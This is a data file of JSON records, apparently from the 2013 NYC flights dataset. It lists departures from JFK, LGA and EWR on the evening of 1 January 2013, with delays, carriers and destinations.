+{"year":2013,"month":1,"day":1,"dep_time":1941,"sched_dep_time":1940,"dep_delay":1,"arr_time":2231,"sched_arr_time":2241,"arr_delay":-10,"carrier":"B6","flight":381,"tailnum":"N632JB","origin":"LGA","dest":"FLL","air_time":152,"distance":1076,"hour":19,"minute":40,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1942,"sched_dep_time":1705,"dep_delay":157,"arr_time":2124,"sched_arr_time":1830,"arr_delay":174,"carrier":"MQ","flight":4410,"tailnum":"N835MQ","origin":"JFK","dest":"DCA","air_time":60,"distance":213,"hour":17,"minute":5,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1945,"sched_dep_time":1940,"dep_delay":5,"arr_time":2247,"sched_arr_time":2231,"arr_delay":16,"carrier":"9E","flight":3361,"tailnum":"N913XJ","origin":"JFK","dest":"JAX","air_time":129,"distance":828,"hour":19,"minute":40,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1946,"sched_dep_time":1930,"dep_delay":16,"arr_time":2148,"sched_arr_time":2134,"arr_delay":14,"carrier":"EV","flight":4532,"tailnum":"N34110","origin":"EWR","dest":"CHS","air_time":106,"distance":628,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1949,"sched_dep_time":1859,"dep_delay":50,"arr_time":2237,"sched_arr_time":2153,"arr_delay":44,"carrier":"B6","flight":711,"tailnum":"N640JB","origin":"JFK","dest":"LAS","air_time":309,"distance":2248,"hour":18,"minute":59,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1952,"sched_dep_time":1930,"dep_delay":22,"arr_time":2358,"sched_arr_time":2207,"carrier":"EV","flight":4333,"tailnum":"N11194","origin":"EWR","dest":"TUL","distance":1215,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1952,"sched_dep_time":2000,"dep_delay":-8,"arr_time":2314,"sched_arr_time":2325,"arr_delay":-11,"carrier":"VX","flight":415,"tailnum":"N640VA","origin":"JFK","dest":"LAX","air_time":349,"distance":2475,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1952,"sched_dep_time":1930,"dep_delay":22,"arr_time":2257,"sched_arr_time":2251,"arr_delay":6,"carrier":"UA","flight":1416,"tailnum":"N76523","origin":"EWR","dest":"SEA","air_time":342,"distance":2402,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1955,"sched_dep_time":2000,"dep_delay":-5,"arr_time":2145,"sched_arr_time":2151,"arr_delay":-6,"carrier":"9E","flight":3409,"tailnum":"N920XJ","origin":"JFK","dest":"PIT","air_time":76,"distance":340,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1957,"sched_dep_time":2005,"dep_delay":-8,"arr_time":2100,"sched_arr_time":2126,"arr_delay":-26,"carrier":"9E","flight":4091,"tailnum":"N8598B","origin":"JFK","dest":"BWI","air_time":41,"distance":184,"hour":20,"minute":5,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1957,"sched_dep_time":1945,"dep_delay":12,"arr_time":2307,"sched_arr_time":2329,"arr_delay":-22,"carrier":"B6","flight":645,"tailnum":"N652JB","origin":"JFK","dest":"SFO","air_time":337,"distance":2586,"hour":19,"minute":45,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1957,"sched_dep_time":2000,"dep_delay":-3,"arr_time":2321,"sched_arr_time":2310,"arr_delay":11,"carrier":"UA","flight":299,"tailnum":"N817UA","origin":"EWR","dest":"DFW","air_time":233,"distance":1372,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1959,"sched_dep_time":1930,"dep_delay":29,"arr_time":2331,"sched_arr_time":2306,"arr_delay":25,"carrier":"DL","flight":1181,"tailnum":"N319NB","origin":"JFK","dest":"SAT","air_time":251,"distance":1587,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":1959,"sched_dep_time":2000,"dep_delay":-1,"arr_time":2310,"sched_arr_time":2307,"arr_delay":3,"carrier":"UA","flight":1233,"tailnum":"N76514","origin":"EWR","dest":"IAH","air_time":232,"distance":1400,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2000,"sched_dep_time":1930,"dep_delay":30,"arr_time":2255,"sched_arr_time":2140,"arr_delay":75,"carrier":"EV","flight":4361,"tailnum":"N12567","origin":"EWR","dest":"TYS","air_time":138,"distance":631,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2000,"sched_dep_time":2000,"dep_delay":0,"arr_time":2054,"sched_arr_time":2110,"arr_delay":-16,"carrier":"9E","flight":3664,"tailnum":"N836AY","origin":"JFK","dest":"PHL","air_time":30,"distance":94,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2002,"sched_dep_time":1955,"dep_delay":7,"arr_time":2306,"sched_arr_time":2310,"arr_delay":-4,"carrier":"AA","flight":1709,"tailnum":"N3GSAA","origin":"LGA","dest":"MIA","air_time":159,"distance":1096,"hour":19,"minute":55,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2003,"sched_dep_time":2000,"dep_delay":3,"arr_time":2302,"sched_arr_time":2311,"arr_delay":-9,"carrier":"UA","flight":1680,"tailnum":"N11206","origin":"EWR","dest":"MIA","air_time":154,"distance":1085,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2006,"sched_dep_time":1630,"dep_delay":216,"arr_time":2230,"sched_arr_time":1848,"arr_delay":222,"carrier":"EV","flight":4644,"tailnum":"N14972","origin":"EWR","dest":"SAV","air_time":121,"distance":708,"hour":16,"minute":30,"time_hour":"2013-01-01 16:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2006,"sched_dep_time":2000,"dep_delay":6,"arr_time":2132,"sched_arr_time":2130,"arr_delay":2,"carrier":"UA","flight":1271,"tailnum":"N12218","origin":"LGA","dest":"ORD","air_time":126,"distance":733,"hour":20,"minute":0,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2008,"sched_dep_time":1855,"dep_delay":73,"arr_time":2223,"sched_arr_time":2100,"arr_delay":83,"carrier":"MQ","flight":4649,"tailnum":"N527MQ","origin":"LGA","dest":"MSP","air_time":163,"distance":1020,"hour":18,"minute":55,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2008,"sched_dep_time":2015,"dep_delay":-7,"arr_time":2206,"sched_arr_time":2210,"arr_delay":-4,"carrier":"MQ","flight":4555,"tailnum":"N734MQ","origin":"LGA","dest":"CMH","air_time":91,"distance":479,"hour":20,"minute":15,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2009,"sched_dep_time":1808,"dep_delay":121,"arr_time":2145,"sched_arr_time":1942,"arr_delay":123,"carrier":"EV","flight":4440,"tailnum":"N14143","origin":"EWR","dest":"PIT","air_time":65,"distance":319,"hour":18,"minute":8,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2012,"sched_dep_time":2016,"dep_delay":-4,"arr_time":2154,"sched_arr_time":2158,"arr_delay":-4,"carrier":"UA","flight":1204,"tailnum":"N24715","origin":"EWR","dest":"CLE","air_time":77,"distance":404,"hour":20,"minute":16,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2013,"sched_dep_time":2015,"dep_delay":-2,"arr_time":2120,"sched_arr_time":2130,"arr_delay":-10,"carrier":"AA","flight":1762,"tailnum":"N3BNAA","origin":"JFK","dest":"BOS","air_time":35,"distance":187,"hour":20,"minute":15,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2015,"sched_dep_time":2005,"dep_delay":10,"arr_time":2149,"sched_arr_time":2144,"arr_delay":5,"carrier":"9E","flight":3320,"tailnum":"N931XJ","origin":"JFK","dest":"BUF","air_time":62,"distance":301,"hour":20,"minute":5,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2016,"sched_dep_time":1930,"dep_delay":46,"sched_arr_time":2220,"carrier":"EV","flight":4204,"tailnum":"N14168","origin":"EWR","dest":"OKC","distance":1325,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2016,"sched_dep_time":1940,"dep_delay":36,"arr_time":2215,"sched_arr_time":2125,"arr_delay":50,"carrier":"MQ","flight":3783,"tailnum":"N509MQ","origin":"JFK","dest":"CMH","air_time":99,"distance":483,"hour":19,"minute":40,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2017,"sched_dep_time":1935,"dep_delay":42,"arr_time":2223,"sched_arr_time":2136,"arr_delay":47,"carrier":"9E","flight":3899,"tailnum":"N8444F","origin":"JFK","dest":"CLE","air_time":91,"distance":425,"hour":19,"minute":35,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2017,"sched_dep_time":2015,"dep_delay":2,"arr_time":2318,"sched_arr_time":2321,"arr_delay":-3,"carrier":"B6","flight":47,"tailnum":"N593JB","origin":"JFK","dest":"FLL","air_time":149,"distance":1069,"hour":20,"minute":15,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2018,"sched_dep_time":2020,"dep_delay":-2,"arr_time":2314,"sched_arr_time":2324,"arr_delay":-10,"carrier":"UA","flight":1299,"tailnum":"N13718","origin":"EWR","dest":"RSW","air_time":157,"distance":1068,"hour":20,"minute":20,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2020,"sched_dep_time":2030,"dep_delay":-10,"arr_time":2148,"sched_arr_time":2155,"arr_delay":-7,"carrier":"FL","flight":354,"tailnum":"N895AT","origin":"LGA","dest":"CAK","air_time":73,"distance":397,"hour":20,"minute":30,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2021,"sched_dep_time":2025,"dep_delay":-4,"arr_time":2351,"sched_arr_time":2341,"arr_delay":10,"carrier":"B6","flight":1069,"tailnum":"N203JB","origin":"JFK","dest":"AUS","air_time":255,"distance":1521,"hour":20,"minute":25,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2023,"sched_dep_time":1945,"dep_delay":38,"arr_time":2240,"sched_arr_time":2206,"arr_delay":34,"carrier":"9E","flight":3352,"tailnum":"N602LR","origin":"JFK","dest":"CVG","air_time":118,"distance":589,"hour":19,"minute":45,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2024,"sched_dep_time":1835,"dep_delay":109,"arr_time":2328,"sched_arr_time":2157,"arr_delay":91,"carrier":"B6","flight":359,"tailnum":"N607JB","origin":"JFK","dest":"BUR","air_time":328,"distance":2465,"hour":18,"minute":35,"time_hour":"2013-01-01 18:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2025,"sched_dep_time":2030,"dep_delay":-5,"arr_time":2334,"sched_arr_time":2348,"arr_delay":-14,"carrier":"DL","flight":1318,"tailnum":"N3740C","origin":"JFK","dest":"FLL","air_time":157,"distance":1069,"hour":20,"minute":30,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2025,"sched_dep_time":2028,"dep_delay":-3,"arr_time":2358,"sched_arr_time":2351,"arr_delay":7,"carrier":"UA","flight":1615,"tailnum":"N76516","origin":"EWR","dest":"AUS","air_time":248,"distance":1504,"hour":20,"minute":28,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2026,"sched_dep_time":2004,"dep_delay":22,"arr_time":2157,"sched_arr_time":2133,"arr_delay":24,"carrier":"EV","flight":4224,"tailnum":"N11189","origin":"EWR","dest":"MKE","air_time":130,"distance":725,"hour":20,"minute":4,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2026,"sched_dep_time":1930,"dep_delay":56,"arr_time":2319,"sched_arr_time":2229,"arr_delay":50,"carrier":"B6","flight":39,"tailnum":"N558JB","origin":"JFK","dest":"PBI","air_time":150,"distance":1028,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2026,"sched_dep_time":1955,"dep_delay":31,"arr_time":2205,"sched_arr_time":2120,"arr_delay":45,"carrier":"WN","flight":195,"tailnum":"N957WN","origin":"EWR","dest":"MDW","air_time":134,"distance":711,"hour":19,"minute":55,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2030,"sched_dep_time":2030,"dep_delay":0,"arr_time":2132,"sched_arr_time":2139,"arr_delay":-7,"carrier":"EV","flight":4660,"tailnum":"N14203","origin":"EWR","dest":"MHT","air_time":33,"distance":209,"hour":20,"minute":30,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2030,"sched_dep_time":2045,"dep_delay":-15,"arr_time":2150,"sched_arr_time":2225,"arr_delay":-35,"carrier":"AA","flight":371,"tailnum":"N545AA","origin":"LGA","dest":"ORD","air_time":126,"distance":733,"hour":20,"minute":45,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2030,"sched_dep_time":2035,"dep_delay":-5,"arr_time":2354,"sched_arr_time":2342,"arr_delay":12,"carrier":"B6","flight":629,"tailnum":"N192JB","origin":"JFK","dest":"HOU","air_time":245,"distance":1428,"hour":20,"minute":35,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2030,"sched_dep_time":2030,"dep_delay":0,"arr_time":2308,"sched_arr_time":2258,"arr_delay":10,"carrier":"B6","flight":115,"tailnum":"N267JB","origin":"JFK","dest":"MSY","air_time":195,"distance":1182,"hour":20,"minute":30,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2031,"sched_dep_time":2030,"dep_delay":1,"arr_time":2344,"sched_arr_time":2335,"arr_delay":9,"carrier":"UA","flight":834,"tailnum":"N822UA","origin":"EWR","dest":"IAH","air_time":223,"distance":1400,"hour":20,"minute":30,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2033,"sched_dep_time":2034,"dep_delay":-1,"arr_time":2134,"sched_arr_time":2151,"arr_delay":-17,"carrier":"UA","flight":994,"tailnum":"N486UA","origin":"EWR","dest":"BOS","air_time":35,"distance":200,"hour":20,"minute":34,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2035,"sched_dep_time":2030,"dep_delay":5,"arr_time":2337,"sched_arr_time":5,"arr_delay":-28,"carrier":"UA","flight":1482,"tailnum":"N38268","origin":"EWR","dest":"LAX","air_time":333,"distance":2454,"hour":20,"minute":30,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2037,"sched_dep_time":2010,"dep_delay":27,"arr_time":2224,"sched_arr_time":2150,"arr_delay":34,"carrier":"EV","flight":4356,"tailnum":"N15572","origin":"EWR","dest":"RDU","air_time":78,"distance":416,"hour":20,"minute":10,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2040,"sched_dep_time":2040,"dep_delay":0,"arr_time":2317,"sched_arr_time":2314,"arr_delay":3,"carrier":"B6","flight":619,"tailnum":"N184JB","origin":"JFK","dest":"JAX","air_time":131,"distance":828,"hour":20,"minute":40,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2046,"sched_dep_time":2035,"dep_delay":11,"arr_time":2144,"sched_arr_time":2213,"arr_delay":-29,"carrier":"9E","flight":3357,"tailnum":"N916XJ","origin":"JFK","dest":"DCA","air_time":43,"distance":213,"hour":20,"minute":35,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2046,"sched_dep_time":2050,"dep_delay":-4,"arr_time":2328,"sched_arr_time":2356,"arr_delay":-28,"carrier":"UA","flight":926,"tailnum":"N414UA","origin":"EWR","dest":"MCO","air_time":136,"distance":937,"hour":20,"minute":50,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2050,"sched_dep_time":1959,"dep_delay":51,"arr_time":2229,"sched_arr_time":2144,"arr_delay":45,"carrier":"MQ","flight":4423,"tailnum":"N853MQ","origin":"JFK","dest":"RDU","air_time":83,"distance":427,"hour":19,"minute":59,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2052,"sched_dep_time":2029,"dep_delay":23,"arr_time":2349,"sched_arr_time":2350,"arr_delay":-1,"carrier":"B6","flight":165,"tailnum":"N536JB","origin":"JFK","dest":"PDX","air_time":331,"distance":2454,"hour":20,"minute":29,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2052,"sched_dep_time":2045,"dep_delay":7,"arr_time":2357,"sched_arr_time":2359,"arr_delay":-2,"carrier":"B6","flight":147,"tailnum":"N535JB","origin":"JFK","dest":"RSW","air_time":163,"distance":1074,"hour":20,"minute":45,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2053,"sched_dep_time":2055,"dep_delay":-2,"arr_time":2254,"sched_arr_time":2250,"arr_delay":4,"carrier":"MQ","flight":4573,"tailnum":"N730MQ","origin":"LGA","dest":"DTW","air_time":102,"distance":502,"hour":20,"minute":55,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2055,"sched_dep_time":2100,"dep_delay":-5,"arr_time":2350,"sched_arr_time":2355,"arr_delay":-5,"carrier":"UA","flight":380,"tailnum":"N441UA","origin":"EWR","dest":"PBI","air_time":142,"distance":1023,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2056,"sched_dep_time":2004,"dep_delay":52,"arr_time":2156,"sched_arr_time":2112,"arr_delay":44,"carrier":"EV","flight":4170,"tailnum":"N12540","origin":"EWR","dest":"ALB","air_time":31,"distance":143,"hour":20,"minute":4,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2056,"sched_dep_time":1944,"dep_delay":72,"arr_time":2210,"sched_arr_time":2109,"arr_delay":61,"carrier":"EV","flight":4692,"tailnum":"N11536","origin":"EWR","dest":"IAD","air_time":51,"distance":212,"hour":19,"minute":44,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2056,"sched_dep_time":2100,"dep_delay":-4,"arr_time":2337,"sched_arr_time":2343,"arr_delay":-6,"carrier":"B6","flight":399,"tailnum":"N510JB","origin":"LGA","dest":"MCO","air_time":140,"distance":950,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2056,"sched_dep_time":2100,"dep_delay":-4,"arr_time":2240,"sched_arr_time":2235,"arr_delay":5,"carrier":"MQ","flight":4507,"tailnum":"N856MQ","origin":"LGA","dest":"RDU","air_time":77,"distance":431,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2057,"sched_dep_time":2100,"dep_delay":-3,"arr_time":2237,"sched_arr_time":2220,"arr_delay":17,"carrier":"MQ","flight":3744,"tailnum":"N521MQ","origin":"EWR","dest":"ORD","air_time":133,"distance":719,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2058,"sched_dep_time":2100,"dep_delay":-2,"arr_time":2342,"sched_arr_time":2317,"arr_delay":25,"carrier":"EV","flight":4088,"tailnum":"N14953","origin":"EWR","dest":"SDF","air_time":136,"distance":642,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2058,"sched_dep_time":2100,"dep_delay":-2,"arr_time":2235,"sched_arr_time":2230,"arr_delay":5,"carrier":"WN","flight":946,"tailnum":"N509SW","origin":"LGA","dest":"MDW","air_time":134,"distance":725,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2058,"sched_dep_time":2100,"dep_delay":-2,"arr_time":8,"sched_arr_time":2359,"arr_delay":9,"carrier":"UA","flight":1241,"tailnum":"N27724","origin":"EWR","dest":"TPA","air_time":159,"distance":997,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2100,"sched_dep_time":2100,"dep_delay":0,"arr_time":2307,"sched_arr_time":2250,"arr_delay":17,"carrier":"MQ","flight":4584,"tailnum":"N0EGMQ","origin":"LGA","dest":"CLT","air_time":101,"distance":544,"hour":21,"minute":0,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2101,"sched_dep_time":2050,"dep_delay":11,"arr_time":2156,"sched_arr_time":2202,"arr_delay":-6,"carrier":"B6","flight":1020,"tailnum":"N587JB","origin":"JFK","dest":"BOS","air_time":34,"distance":187,"hour":20,"minute":50,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2102,"sched_dep_time":2108,"dep_delay":-6,"arr_time":146,"sched_arr_time":158,"arr_delay":-12,"carrier":"UA","flight":1180,"tailnum":"N78511","origin":"EWR","dest":"SJU","air_time":199,"distance":1608,"hour":21,"minute":8,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2103,"sched_dep_time":2110,"dep_delay":-7,"arr_time":2345,"sched_arr_time":17,"arr_delay":-32,"carrier":"DL","flight":1668,"tailnum":"N3738B","origin":"JFK","dest":"LAS","air_time":309,"distance":2248,"hour":21,"minute":10,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2107,"sched_dep_time":2040,"dep_delay":27,"arr_time":2354,"sched_arr_time":2359,"arr_delay":-5,"carrier":"B6","flight":677,"tailnum":"N779JB","origin":"JFK","dest":"LAX","air_time":323,"distance":2475,"hour":20,"minute":40,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2108,"sched_dep_time":2057,"dep_delay":11,"arr_time":25,"sched_arr_time":39,"arr_delay":-14,"carrier":"UA","flight":1517,"tailnum":"N17245","origin":"EWR","dest":"SFO","air_time":354,"distance":2565,"hour":20,"minute":57,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2109,"sched_dep_time":2115,"dep_delay":-6,"arr_time":2351,"sched_arr_time":2357,"arr_delay":-6,"carrier":"B6","flight":529,"tailnum":"N796JB","origin":"EWR","dest":"MCO","air_time":138,"distance":937,"hour":21,"minute":15,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2110,"sched_dep_time":2020,"dep_delay":50,"arr_time":2340,"sched_arr_time":2245,"arr_delay":55,"carrier":"MQ","flight":4662,"tailnum":"N532MQ","origin":"LGA","dest":"ATL","air_time":127,"distance":762,"hour":20,"minute":20,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2115,"sched_dep_time":2110,"dep_delay":5,"arr_time":2240,"sched_arr_time":2223,"arr_delay":17,"carrier":"EV","flight":4119,"tailnum":"N15986","origin":"EWR","dest":"RIC","air_time":65,"distance":277,"hour":21,"minute":10,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2115,"sched_dep_time":1700,"dep_delay":255,"arr_time":2330,"sched_arr_time":1920,"arr_delay":250,"carrier":"9E","flight":3347,"tailnum":"N924XJ","origin":"JFK","dest":"CVG","air_time":115,"distance":589,"hour":17,"minute":0,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2116,"sched_dep_time":2110,"dep_delay":6,"arr_time":2202,"sched_arr_time":2212,"arr_delay":-10,"carrier":"EV","flight":4404,"tailnum":"N15912","origin":"EWR","dest":"PVD","air_time":28,"distance":160,"hour":21,"minute":10,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2119,"sched_dep_time":1930,"dep_delay":109,"arr_time":2358,"sched_arr_time":2136,"arr_delay":142,"carrier":"EV","flight":4543,"tailnum":"N13123","origin":"EWR","dest":"DSM","air_time":200,"distance":1017,"hour":19,"minute":30,"time_hour":"2013-01-01 19:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2120,"sched_dep_time":2130,"dep_delay":-10,"arr_time":16,"sched_arr_time":18,"arr_delay":-2,"carrier":"B6","flight":383,"tailnum":"N603JB","origin":"LGA","dest":"FLL","air_time":160,"distance":1076,"hour":21,"minute":30,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2121,"sched_dep_time":2040,"dep_delay":41,"arr_time":6,"sched_arr_time":2323,"arr_delay":43,"carrier":"B6","flight":227,"tailnum":"N307JB","origin":"EWR","dest":"MCO","air_time":143,"distance":937,"hour":20,"minute":40,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2122,"sched_dep_time":2125,"dep_delay":-3,"arr_time":2312,"sched_arr_time":2250,"arr_delay":22,"carrier":"MQ","flight":4660,"tailnum":"N1EAMQ","origin":"LGA","dest":"BNA","air_time":153,"distance":764,"hour":21,"minute":25,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2128,"sched_dep_time":2135,"dep_delay":-7,"arr_time":26,"sched_arr_time":50,"arr_delay":-24,"carrier":"AA","flight":185,"tailnum":"N338AA","origin":"JFK","dest":"LAX","air_time":338,"distance":2475,"hour":21,"minute":35,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2128,"sched_dep_time":2125,"dep_delay":3,"arr_time":2243,"sched_arr_time":2240,"arr_delay":3,"carrier":"MQ","flight":4449,"tailnum":"N810MQ","origin":"JFK","dest":"DCA","air_time":54,"distance":213,"hour":21,"minute":25,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2129,"sched_dep_time":2120,"dep_delay":9,"arr_time":2342,"sched_arr_time":2351,"arr_delay":-9,"carrier":"B6","flight":97,"tailnum":"N625JB","origin":"JFK","dest":"DEN","air_time":223,"distance":1626,"hour":21,"minute":20,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2134,"sched_dep_time":2045,"dep_delay":49,"arr_time":20,"sched_arr_time":2352,"arr_delay":28,"carrier":"UA","flight":1106,"tailnum":"N27733","origin":"EWR","dest":"FLL","air_time":152,"distance":1065,"hour":20,"minute":45,"time_hour":"2013-01-01 20:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2136,"sched_dep_time":2145,"dep_delay":-9,"arr_time":25,"sched_arr_time":39,"arr_delay":-14,"carrier":"B6","flight":515,"tailnum":"N198JB","origin":"EWR","dest":"FLL","air_time":154,"distance":1065,"hour":21,"minute":45,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2140,"sched_dep_time":2135,"dep_delay":5,"arr_time":210,"sched_arr_time":224,"arr_delay":-14,"carrier":"B6","flight":701,"tailnum":"N284JB","origin":"JFK","dest":"SJU","air_time":189,"distance":1598,"hour":21,"minute":35,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2157,"sched_dep_time":2155,"dep_delay":2,"arr_time":43,"sched_arr_time":41,"arr_delay":2,"carrier":"B6","flight":43,"tailnum":"N537JB","origin":"JFK","dest":"MCO","air_time":140,"distance":944,"hour":21,"minute":55,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2158,"sched_dep_time":2200,"dep_delay":-2,"arr_time":2254,"sched_arr_time":2307,"arr_delay":-13,"carrier":"EV","flight":4103,"tailnum":"N14998","origin":"EWR","dest":"BWI","air_time":36,"distance":169,"hour":22,"minute":0,"time_hour":"2013-01-01 22:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2205,"sched_dep_time":1720,"dep_delay":285,"arr_time":46,"sched_arr_time":2040,"arr_delay":246,"carrier":"AA","flight":1999,"tailnum":"N5DNAA","origin":"EWR","dest":"MIA","air_time":146,"distance":1085,"hour":17,"minute":20,"time_hour":"2013-01-01 17:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2209,"sched_dep_time":2145,"dep_delay":24,"arr_time":58,"sched_arr_time":37,"arr_delay":21,"carrier":"B6","flight":35,"tailnum":"N608JB","origin":"JFK","dest":"PBI","air_time":143,"distance":1028,"hour":21,"minute":45,"time_hour":"2013-01-01 21:00:00"} +{"year":2013,"month":1,"day":1,"dep_time":2209,"sched_dep_time":2155,"dep_delay":14,"arr_time":2400,"sched_arr_time":2337,"arr_delay":23,"carrier":"B6","flight":1109,"tailnum":"N216JB","origin":"JFK","dest":"RDU","air_time":86,"distance":427,"hour":21,"minute":55,"time_hour":"2013-01-01 21:00:00"} 